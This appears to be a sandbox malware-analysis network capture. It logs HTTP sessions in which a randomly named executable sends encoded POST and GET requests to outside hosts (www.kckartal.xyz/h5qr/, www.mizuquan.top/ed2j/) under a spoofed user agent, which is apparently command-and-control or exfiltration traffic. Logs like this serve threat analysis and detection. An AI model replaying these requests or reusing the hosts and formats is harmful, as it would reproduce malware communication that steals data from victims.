                                        Data Raw: 32 64 38 0d 0a 1f 8b 08 00 00 00 00 00 00 03 64 54 ed 8a db 3a 10 fd 1f e8 3b cc 7a 29 74 21 de c8 59 87 16 db 31 2d fd a0 17 4a ef 42 17 2e fd 29 5b e3 68 58 59 72 a5 89 93 b4 f4 dd 2f 72 92 fd 68 35 20 4b e3 33 a3 99 33 23 55 17 1f fe 7d 7f f7 fd f6 23 68 ee 4d 3d ab e2 07 02 1f 0c ae 13 8d b4 d1 5c 64 42 bc 4c e2 2f 94 aa 9e 55 3d b2 04 2b 7b 5c 27 23 e1 6e 70 9e 13 68 9d 65 b4 bc 4e 76 a4 58 af 15 8e d4 62 3a 6d e6 40 96 98 a4 49 43 2b 0d ae b3 39 04 ed c9 de a7 ec d2 8e 78 6d 5d 02 8b 7a 56 31 b1 c1 1a 72 91 c3 57 c7 f0 c9 6d ad 7a 31 ab 16 47 7d 35 05 55 bf ed 51 91 84 57 83 c7 0e 7d 48 5b 67 9c 4f 43 ab b1 c7 42 49 7f 7f f5 ab 71 ea f0 ab 91 ed fd c6 47 17 47 48 71 29 84 b8 a0 3e 86 2b 2d ff fe 5d 2d 8e 0e ab c5 29 af 68 76 ce fc 68 02 97 79 9e 97 d0 4b bf 21 5b 88 b2 73 96 0b b0 ce f7 d2 40 96 0f fb c5 52 0c 7b 78 e7 49 9a 39 7c 46 33 22 53 2b e7 10 a4 0d 69 40 4f 5d 09 4f 48 2c e1 af a8 e0 b2 eb ba 32 b2 ab 68 fc 83 77 b9 65 57 42 4f 36 7d e6 23 a9 21 8e a7 06 8c 7b 4e a5 a1 8d 2d a0 45 cb [TRUNCATED]
                                        Data Ascii: 2d8dT:;z)t!Y1-JB.)[hXYr/rh5 K33#U}#hM=\dBL/U=+{\'#npheNvXb:m@IC+9xm]zV1rWmz1G}5UQW}H[gOCBIqGGHq)>+-]-)hvhyK![s@R{xI9|F3"S+i@O]OH,2hweWBO6}#!{N-EK/1);. brMpfXx]168Jg8HJ'jrkCGU3L\Bg1Hln>^j4[Z5chhk/P>O(=5M'<r9SS
                                        Sep 11, 2024 10:11:11.106491089 CEST233INData Raw: a9 14 d9 4d 11 5b 21 86 09 e7 45 f9 40 b0 47 23 99 46 2c 5b 83 d2 17 8d 63 5d 3e d6 f4 c1 df 94 79 9a 89 6c d8 97 7f f7 6f fe 3a 4a d9 38 af d0 4f 50 c8 86 3d 04 67 48 81 df 34 f2 95 98 4f 72 9d ad ae ca c6 ed d3 a0 a5 72 bb 02 c4 04 14 47 d0 72
                                        Data Ascii: M[!E@G#F,[c]>ylo:J8OP=gH4OrrGr$ol@w[e0zT1~|jXK~V[g0?SI$@AH meN/wYOb<3^x?e0


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        31192.168.2.2249192104.21.20.125801544C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exe
                                        TimestampBytes transferredDirectionData
                                        Sep 11, 2024 10:11:13.051879883 CEST723OUTPOST /h5qr/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en
                                        Host: www.kckartal.xyz
                                        Origin: http://www.kckartal.xyz
                                        Referer: http://www.kckartal.xyz/h5qr/
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Content-Length: 202
                                        Cache-Control: max-age=0
                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                        Data Raw: 4f 6c 54 58 65 3d 79 5a 4f 39 61 42 37 34 57 33 41 33 75 65 5a 65 68 70 55 53 32 50 72 75 39 32 37 71 71 62 66 55 46 4e 69 6e 32 50 4e 4e 6d 71 39 54 31 4c 49 71 49 61 78 77 70 6f 4b 53 63 56 66 77 41 4f 75 69 4e 63 30 53 45 61 64 72 38 46 4e 6c 32 6e 4a 52 63 63 32 30 6f 4a 41 33 35 72 71 67 52 36 69 4c 67 7a 37 58 62 39 79 72 66 34 49 2b 49 53 78 33 42 2b 43 4b 69 6a 31 6c 58 61 79 6f 4d 63 6c 73 6e 34 41 36 4f 51 73 74 53 35 70 4d 65 77 77 56 47 59 70 46 4c 4d 66 2b 47 4a 72 49 43 43 66 30 74 35 48 6e 67 63 37 74 65 62 74 57 41 65 7a 38 63 49 35 36 48 57 73 6f 30 6e 31 74 6d 7a 42 52 70 67 3d 3d
                                        Data Ascii: OlTXe=yZO9aB74W3A3ueZehpUS2Pru927qqbfUFNin2PNNmq9T1LIqIaxwpoKScVfwAOuiNc0SEadr8FNl2nJRcc20oJA35rqgR6iLgz7Xb9yrf4I+ISx3B+CKij1lXayoMclsn4A6OQstS5pMewwVGYpFLMf+GJrICCf0t5Hngc7tebtWAez8cI56HWso0n1tmzBRpg==
                                        Sep 11, 2024 10:11:13.640247107 CEST1236INHTTP/1.1 404 Not Found
                                        Date: Wed, 11 Sep 2024 08:11:13 GMT
                                        Content-Type: text/html
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                        pragma: no-cache
                                        vary: User-Agent
                                        x-turbo-charged-by: LiteSpeed
                                        cf-cache-status: DYNAMIC
                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=j8kyXab7dwYi%2BYzMhyl6eTU3nEQ%2BTalvjUidLASj8LLz8AcLn8ywE1nD%2F88tGJL%2BbUA%2BTIuuZLplZXJo6c45XWCO05C%2FKynysmthn15S4fFLkimLu9E2t55GRLrXBdipo%2FdL"}],"group":"cf-nel","max_age":604800}
                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                        Server: cloudflare
                                        CF-RAY: 8c162f90fa6c0f7f-EWR
                                        Content-Encoding: gzip
                                        alt-svc: h3=":443"; ma=86400
                                        Data Raw: 32 64 38 0d 0a 1f 8b 08 00 00 00 00 00 00 03 64 54 ed 8a db 3a 10 fd 1f e8 3b cc 7a 29 74 21 de c8 59 87 16 db 31 2d fd a0 17 4a ef 42 17 2e fd 29 5b e3 68 58 59 72 a5 89 93 b4 f4 dd 2f 72 92 fd 68 35 20 4b e3 33 a3 99 33 23 55 17 1f fe 7d 7f f7 fd f6 23 68 ee 4d 3d ab e2 07 02 1f 0c ae 13 8d b4 d1 5c 64 42 bc 4c e2 2f 94 aa 9e 55 3d b2 04 2b 7b 5c 27 23 e1 6e 70 9e 13 68 9d 65 b4 bc 4e 76 a4 58 af 15 8e d4 62 3a 6d e6 40 96 98 a4 49 43 2b 0d ae b3 39 04 ed c9 de a7 ec d2 8e 78 6d 5d 02 8b 7a 56 31 b1 c1 1a 72 91 c3 57 c7 f0 c9 6d ad 7a 31 ab 16 47 7d 35 05 55 bf ed 51 91 84 57 83 c7 0e 7d 48 5b 67 9c 4f 43 ab b1 c7 42 49 7f 7f f5 ab 71 ea f0 ab 91 ed fd c6 47 17 47 48 71 29 84 b8 a0 3e 86 2b 2d ff fe 5d 2d 8e 0e ab c5 29 af 68 76 ce fc 68 02 97 79 9e 97 d0 4b bf 21 5b 88 b2 73 96 0b b0 ce f7 d2 40 96 0f fb c5 52 0c 7b 78 e7 49 9a 39 7c 46 33 22 53 2b e7 10 a4 0d 69 40 4f 5d 09 4f 48 2c e1 af a8 e0 b2 eb ba 32 b2 ab 68 fc 83 77 b9 65 57 42 4f 36 7d e6 23 a9 21 8e a7 06 8c 7b 4e a5 a1 8d 2d a0 45 cb [TRUNCATED]
                                        Data Ascii: 2d8dT:;z)t!Y1-JB.)[hXYr/rh5 K33#U}#hM=\dBL/U=+{\'#npheNvXb:m@IC+9xm]zV1rWmz1G}5UQW}H[gOCBIqGGHq)>+-]-)hvhyK![s@R{xI9|F3"S+i@O]OH,2hweWBO6}#!{N-EK/1);. brMpfXx]168Jg8HJ'jrkCGU3L\Bg1Hln>^j4[Z5chhk/P>O(=5M'<r9
                                        Sep 11, 2024 10:11:13.640358925 CEST239INData Raw: cb 53 fa 53 85 06 a9 14 d9 4d 11 5b 21 86 09 e7 45 f9 40 b0 47 23 99 46 2c 5b 83 d2 17 8d 63 5d 3e d6 f4 c1 df 94 79 9a 89 6c d8 97 7f f7 6f fe 3a 4a d9 38 af d0 4f 50 c8 86 3d 04 67 48 81 df 34 f2 95 98 4f 72 9d ad ae ca c6 ed d3 a0 a5 72 bb 02
                                        Data Ascii: SSM[!E@G#F,[c]>ylo:J8OP=gH4OrrGr$ol@w[e0zT1~|jXK~V[g0?SI$@AH meN/wYOb<3^x?e0


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        32192.168.2.2249193104.21.20.125801544C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exe
                                        TimestampBytes transferredDirectionData
                                        Sep 11, 2024 10:11:15.602130890 CEST2472OUTPOST /h5qr/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en
                                        Host: www.kckartal.xyz
                                        Origin: http://www.kckartal.xyz
                                        Referer: http://www.kckartal.xyz/h5qr/
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Content-Length: 3626
                                        Cache-Control: max-age=0
                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                        Data Raw: 4f 6c 54 58 65 3d 79 5a 4f 39 61 42 37 34 57 33 41 33 75 2b 70 65 74 71 73 53 78 76 72 70 68 6d 37 71 34 62 66 51 46 4e 2b 6e 32 4b 31 64 6d 59 78 54 31 63 4d 71 49 38 4e 77 76 6f 4b 53 61 56 66 30 45 4f 75 4f 4e 64 52 70 45 59 30 55 38 47 68 6c 77 45 68 52 55 36 69 33 77 4a 41 69 39 72 71 6a 52 36 6a 44 67 79 4c 54 62 35 75 42 66 34 77 2b 49 42 4a 33 45 4f 44 63 2b 54 31 6c 58 61 7a 70 4d 63 6c 4d 6e 34 34 69 4f 52 70 77 52 49 35 4d 65 53 49 56 4a 66 46 61 4e 4d 66 36 50 70 71 34 44 7a 65 64 6b 37 37 47 6e 64 44 64 54 72 39 41 48 63 72 69 46 70 56 6d 46 6b 74 42 79 69 4d 47 74 6e 4a 56 33 4c 79 72 52 4e 36 48 4c 6d 79 45 4a 48 6c 30 38 65 5a 67 65 36 68 50 6b 49 54 4a 64 6f 36 58 6d 33 32 44 69 54 59 65 43 37 68 70 50 58 44 45 41 69 64 78 65 43 75 63 33 31 37 59 4f 72 2f 33 67 54 61 46 52 53 59 6f 50 67 6a 46 6d 45 41 51 38 6a 70 34 4b 48 69 50 67 56 65 44 51 50 51 65 36 78 76 39 72 35 32 64 50 4d 79 49 43 6a 77 52 79 44 2b 6e 68 41 58 47 6e 67 75 4e 57 63 56 64 37 58 4e 4a 32 63 42 30 67 49 35 41 [TRUNCATED]
                                        Data Ascii: OlTXe=yZO9aB74W3A3u+petqsSxvrphm7q4bfQFN+n2K1dmYxT1cMqI8NwvoKSaVf0EOuONdRpEY0U8GhlwEhRU6i3wJAi9rqjR6jDgyLTb5uBf4w+IBJ3EODc+T1lXazpMclMn44iORpwRI5MeSIVJfFaNMf6Ppq4Dzedk77GndDdTr9AHcriFpVmFktByiMGtnJV3LyrRN6HLmyEJHl08eZge6hPkITJdo6Xm32DiTYeC7hpPXDEAidxeCuc317YOr/3gTaFRSYoPgjFmEAQ8jp4KHiPgVeDQPQe6xv9r52dPMyICjwRyD+nhAXGnguNWcVd7XNJ2cB0gI5AzcvY4uALhyaTbW5l9hrs3c3SwQ4BzUXD/e6lBrDnnZdGs/8O53CK1NJP60akV1AMqziQy9vXpaxgjox0X8gkPhcqKE061TBSi+lXuAgKsBDMJLrKC66a5LPn28N233887GSAU+oSpOfoERhxC7XUhCCLgdjPDs5R3E6E76zF+HMmg+Cv3SXpQXa9RW8hNflfNzOo32SUUCFx8K4+bEs1q3RUsaKePR5B4G7uXObsZUGqnqCENlhoWrdCyvksovmWKcGSVs7RiDKdZwVHFWX4vWJ0XURSQ2Rgldew5So+ROcWoajsNVSn+jIwx6YfTWLSDXlUtugpDjdPOIZ+Oi7f+rX6OsM3WvZnNGlAt5424p2b30NRzJjDq/6HM/mTOP9VkuS543DN+x1XtSIuLDPvLPqC5r3bNVRVpMCp1YYtUsAbrC14F2NxONFzMYhb7PesS90WF6qfIGj462d7d+5xntopyji4S0JVNQhmosudJTUb66zN3f8VMkgBaFxoJrWi/1CCIbxdF3e+dWXIh5Y0Tkeh0Kyh4XiYEOIt4FX1YXlhpRqEPdxdMa/qPnU/GajEPZVnIde2GOk46IoMxa/DYSRp8DDv+xvfia9IFqBBPqHimSWJ3LlH1Y9HwTzFgtxByjy5tuOLhvKVqvQIpw0OoprgfuuFeyTkZW [TRUNCATED]
                                        Sep 11, 2024 10:11:15.607566118 CEST1676OUTData Raw: 34 68 52 50 48 75 4c 35 7a 37 65 4e 34 39 49 51 6e 71 6c 78 65 73 56 4e 68 74 6c 37 6b 6f 74 76 75 44 78 6c 70 2b 70 53 31 6b 67 49 4c 34 69 7a 34 4e 76 49 72 35 72 37 56 78 52 65 54 49 6c 70 4b 2f 4f 72 50 2b 61 72 54 64 72 41 45 68 6b 62 73 41
                                        Data Ascii: 4hRPHuL5z7eN49IQnqlxesVNhtl7kotvuDxlp+pS1kgIL4iz4NvIr5r7VxReTIlpK/OrP+arTdrAEhkbsATgLRFW+6YKKFFHGU4o3WeRHCtIHU8FLw4CPu5vYcIn0h1/tIb0Ta29lyPA4t+aKbOJgfCDzrzYQvI5czveo9FhfTCexdYPN0mH2FIajlGj7QST2zy5F/qR7WUrTvBaoTnopmp/SbFpXdIWqpuaCNO48FF/RX5rRaT
                                        Sep 11, 2024 10:11:16.254100084 CEST1236INHTTP/1.1 404 Not Found
                                        Date: Wed, 11 Sep 2024 08:11:16 GMT
                                        Content-Type: text/html
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                        pragma: no-cache
                                        vary: User-Agent
                                        x-turbo-charged-by: LiteSpeed
                                        CF-Cache-Status: DYNAMIC
                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6Md21SjjXZTTrzwKPSfI2netjJE7iPK2stIFIbp%2BjdGa3PU%2FuJjS9woUOCkN9Yp%2B33VpFiBHSPVecsQuj5nvKhFW1IIribN4xvm94VL0tyTv%2BRzWSbhiQ6GLwl8sPV6Sjfpw"}],"group":"cf-nel","max_age":604800}
                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                        Server: cloudflare
                                        CF-RAY: 8c162fa0f992424d-EWR
                                        Content-Encoding: gzip
                                        alt-svc: h3=":443"; ma=86400
                                        Data Raw: 32 64 38 0d 0a 1f 8b 08 00 00 00 00 00 00 03 64 54 ed 8a db 3a 10 fd 1f e8 3b cc 7a 29 74 21 de c8 59 87 16 db 31 2d fd a0 17 4a ef 42 17 2e fd 29 5b e3 68 58 59 72 a5 89 93 b4 f4 dd 2f 72 92 fd 68 35 20 4b e3 33 a3 99 33 23 55 17 1f fe 7d 7f f7 fd f6 23 68 ee 4d 3d ab e2 07 02 1f 0c ae 13 8d b4 d1 5c 64 42 bc 4c e2 2f 94 aa 9e 55 3d b2 04 2b 7b 5c 27 23 e1 6e 70 9e 13 68 9d 65 b4 bc 4e 76 a4 58 af 15 8e d4 62 3a 6d e6 40 96 98 a4 49 43 2b 0d ae b3 39 04 ed c9 de a7 ec d2 8e 78 6d 5d 02 8b 7a 56 31 b1 c1 1a 72 91 c3 57 c7 f0 c9 6d ad 7a 31 ab 16 47 7d 35 05 55 bf ed 51 91 84 57 83 c7 0e 7d 48 5b 67 9c 4f 43 ab b1 c7 42 49 7f 7f f5 ab 71 ea f0 ab 91 ed fd c6 47 17 47 48 71 29 84 b8 a0 3e 86 2b 2d ff fe 5d 2d 8e 0e ab c5 29 af 68 76 ce fc 68 02 97 79 9e 97 d0 4b bf 21 5b 88 b2 73 96 0b b0 ce f7 d2 40 96 0f fb c5 52 0c 7b 78 e7 49 9a 39 7c 46 33 22 53 2b e7 10 a4 0d 69 40 4f 5d 09 4f 48 2c e1 af a8 e0 b2 eb ba 32 b2 ab 68 fc 83 77 b9 65 57 42 4f 36 7d e6 23 a9 21 8e a7 06 8c 7b 4e a5 a1 8d 2d a0 45 cb [TRUNCATED]
                                        Data Ascii: 2d8dT:;z)t!Y1-JB.)[hXYr/rh5 K33#U}#hM=\dBL/U=+{\'#npheNvXb:m@IC+9xm]zV1rWmz1G}5UQW}H[gOCBIqGGHq)>+-]-)hvhyK![s@R{xI9|F3"S+i@O]OH,2hweWBO6}#!{N-EK/1);. brMpfXx]168Jg8HJ'jrkCGU3L\Bg1Hln>^j4[Z5chhk/P>O(=5M'<r9SS
                                        Sep 11, 2024 10:11:16.254115105 CEST233INData Raw: a9 14 d9 4d 11 5b 21 86 09 e7 45 f9 40 b0 47 23 99 46 2c 5b 83 d2 17 8d 63 5d 3e d6 f4 c1 df 94 79 9a 89 6c d8 97 7f f7 6f fe 3a 4a d9 38 af d0 4f 50 c8 86 3d 04 67 48 81 df 34 f2 95 98 4f 72 9d ad ae ca c6 ed d3 a0 a5 72 bb 02 c4 04 14 47 d0 72
                                        Data Ascii: M[!E@G#F,[c]>ylo:J8OP=gH4OrrGr$ol@w[e0zT1~|jXK~V[g0?SI$@AH meN/wYOb<3^x?e0


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        33192.168.2.2249194104.21.20.125801544C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exe
                                        TimestampBytes transferredDirectionData
                                        Sep 11, 2024 10:11:18.149590969 CEST456OUTGET /h5qr/?th=XXRlJ2&OlTXe=/bmdZ0vLXnogocV0idkPv6fvlXir++PhB87loKV3gq9LyeQpMfhy5LnTQyXzEM68COgVHo1sr0sPxg1PcZaDoopDxaOUW7iZ7CHsWJT1TI0rPygwHovQ2DwKWcHt HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                        Accept-Language: en-US,en
                                        Host: www.kckartal.xyz
                                        Connection: close
                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                        Sep 11, 2024 10:11:18.744267941 CEST1236INHTTP/1.1 404 Not Found
                                        Date: Wed, 11 Sep 2024 08:11:18 GMT
                                        Content-Type: text/html
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                        pragma: no-cache
                                        vary: User-Agent
                                        x-turbo-charged-by: LiteSpeed
                                        CF-Cache-Status: DYNAMIC
                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JifVl%2Feh2TXRNbetTliwOifvDzVqBTClE6Fbe7njkl03juwr3DZNmLBTbbn5lHNISqqaxcr2R7uPNnzuYehs9F1InRGImEdiDv8GUi5D8QZLfWtoqR0dqYp3CmxByRcbX%2BWq"}],"group":"cf-nel","max_age":604800}
                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                        Server: cloudflare
                                        CF-RAY: 8c162fb0e8577291-EWR
                                        alt-svc: h3=":443"; ma=86400
                                        Data Raw: 34 65 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 [TRUNCATED]
                                        Data Ascii: 4e3<!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top
                                        Sep 11, 2024 10:11:18.744292021 CEST723INData Raw: 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78
                                        Data Ascii: : 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></di
                                        Sep 11, 2024 10:11:18.744714022 CEST5INData Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        34192.168.2.224919543.242.202.169801544C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exe
                                        TimestampBytes transferredDirectionData
                                        Sep 11, 2024 10:11:24.094726086 CEST2472OUTPOST /ed2j/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en
                                        Host: www.mizuquan.top
                                        Origin: http://www.mizuquan.top
                                        Referer: http://www.mizuquan.top/ed2j/
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Content-Length: 2162
                                        Cache-Control: max-age=0
                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                        Data Raw: 4f 6c 54 58 65 3d 4b 6c 77 76 31 45 45 4e 6d 63 63 50 79 4e 67 5a 65 67 79 6a 4f 34 38 70 65 76 53 79 42 6a 55 42 63 4d 72 64 51 62 77 49 35 72 4e 2f 54 58 68 2b 65 7a 2b 62 53 41 37 56 68 6c 62 48 74 42 2f 39 62 66 54 64 72 43 48 50 68 32 48 62 71 32 2b 4d 6a 53 58 77 48 4f 71 4c 69 37 77 45 30 43 75 76 75 55 69 33 58 31 30 59 54 65 4d 2f 6a 66 56 4c 78 76 75 6c 71 68 46 62 49 57 52 66 53 48 2f 6c 63 79 58 42 57 2b 36 62 36 58 39 79 53 57 4e 65 54 75 34 75 4b 4e 54 53 78 78 57 35 70 43 69 68 35 53 59 36 77 34 38 31 67 4e 33 2b 6a 2f 42 46 6a 34 6f 45 6e 61 74 36 6a 4a 69 6e 6d 37 54 61 38 75 4a 68 35 64 36 37 35 43 2b 71 6e 34 44 71 31 37 74 62 31 34 36 56 77 79 6f 50 43 4d 73 43 43 75 4f 69 46 78 39 7a 31 44 78 6e 42 41 2f 2f 6e 6e 50 6c 4e 34 63 67 74 71 76 65 32 4e 66 36 46 55 4f 6a 65 56 48 6c 55 42 5a 46 4a 75 6c 2b 37 56 70 54 44 46 4d 2f 77 31 77 43 34 31 30 6d 39 58 52 66 43 38 59 6e 6f 4a 4e 2f 4a 35 57 58 71 52 39 33 6b 35 38 6e 58 43 41 75 64 6d 50 6c 46 42 57 51 30 4b 45 42 4a 33 74 34 [TRUNCATED]
                                        Data Ascii: OlTXe=Klwv1EENmccPyNgZegyjO48pevSyBjUBcMrdQbwI5rN/TXh+ez+bSA7VhlbHtB/9bfTdrCHPh2Hbq2+MjSXwHOqLi7wE0CuvuUi3X10YTeM/jfVLxvulqhFbIWRfSH/lcyXBW+6b6X9ySWNeTu4uKNTSxxW5pCih5SY6w481gN3+j/BFj4oEnat6jJinm7Ta8uJh5d675C+qn4Dq17tb146VwyoPCMsCCuOiFx9z1DxnBA//nnPlN4cgtqve2Nf6FUOjeVHlUBZFJul+7VpTDFM/w1wC410m9XRfC8YnoJN/J5WXqR93k58nXCAudmPlFBWQ0KEBJ3t4vGWSQpB2l3TRLr3Zlu5eQcGvPfdsFoOS5hRZugX1D6jzmOuVU01gRNGLe5lnWZL8vXWbWIwtRjO/Tmz9QJ76xXv1M1/EGHD/Y8pZ8eRUl4KipnjSJRv2COmF3HZ1hq6qbENAQWr1do3ocBjzA97s21ZWLS00ujoOKxS8T3py4Xwk4rJWB1zRoTnJHzcqbQ7AdyTCSpQFg1F2bzMX8rlKHtUpmlLv4ui8F8ErI+RuBxi/I0imJD6XloW7317Gc7cYxNop71J2BhA255k4UC/eh0VAD7KELe+L07ZCx8ZdzIOg/lw0pbfNIIB7n2nbCk38ZtLWvERaydLkiT6r4hwu9WYG+sjPPIMnfNxWerIp1lzIWthbolUt3xP6GDIW9UvbJYZtazHXnjfpctCtS9E01LqqPXNCQV3yL76Oc8swCBqo4QC5ZsK0qcneKesrLcHcdEbZ1rfXcTaD5LVy8oTXWG+BnBrrtAoC1vSpO3Mm27sCDUaTUC5vqXEnEf5hXMOgRJg6ID8E0yIN57cpnRvqMzuFJTyxeiZqKiYyW8hxrQwQyGxbzk4g43yo5Jp/9mQ3vWEvr2sjRjoRuRO1eRpNMO/3WpbawvPFOOauP7RQwIjol4Rl10ZVwqa3gAF6ZvmU8s4RcPQoyg/I2P3kZ+O5wcpuicloDpaFcU [TRUNCATED]
                                        Sep 11, 2024 10:11:24.099747896 CEST212OUTData Raw: 65 46 4c 4f 31 6c 33 49 5a 67 55 2b 33 68 56 44 79 6c 46 6e 74 4d 45 78 70 63 62 74 47 6d 76 6f 2b 44 48 6c 49 62 37 42 56 65 6f 4c 75 4e 51 6b 63 2b 59 36 74 4b 6f 41 4d 4a 67 55 37 4f 65 6b 49 63 54 71 70 44 31 4c 48 43 65 77 7a 62 51 31 4f 47
                                        Data Ascii: eFLO1l3IZgU+3hVDylFntMExpcbtGmvo+DHlIb7BVeoLuNQkc+Y6tKoAMJgU7OekIcTqpD1LHCewzbQ1OG3DBcqAisFZZPrv0Ckhzdfzb8edxe4dfreWXpCruXGEzYsL34i26c7VnMeLVi7kFuPSgSGUOP7pPg95kZik0G4l/2+cWEbnSSXiqTBfT9OozwaJ7t4R+oRiKJwTCHw+nOdA
                                        Sep 11, 2024 10:11:25.267967939 CEST691INHTTP/1.1 404 Not Found
                                        Server: nginx
                                        Date: Wed, 11 Sep 2024 08:11:24 GMT
                                        Content-Type: text/html
                                        Content-Length: 548
                                        Connection: close
                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 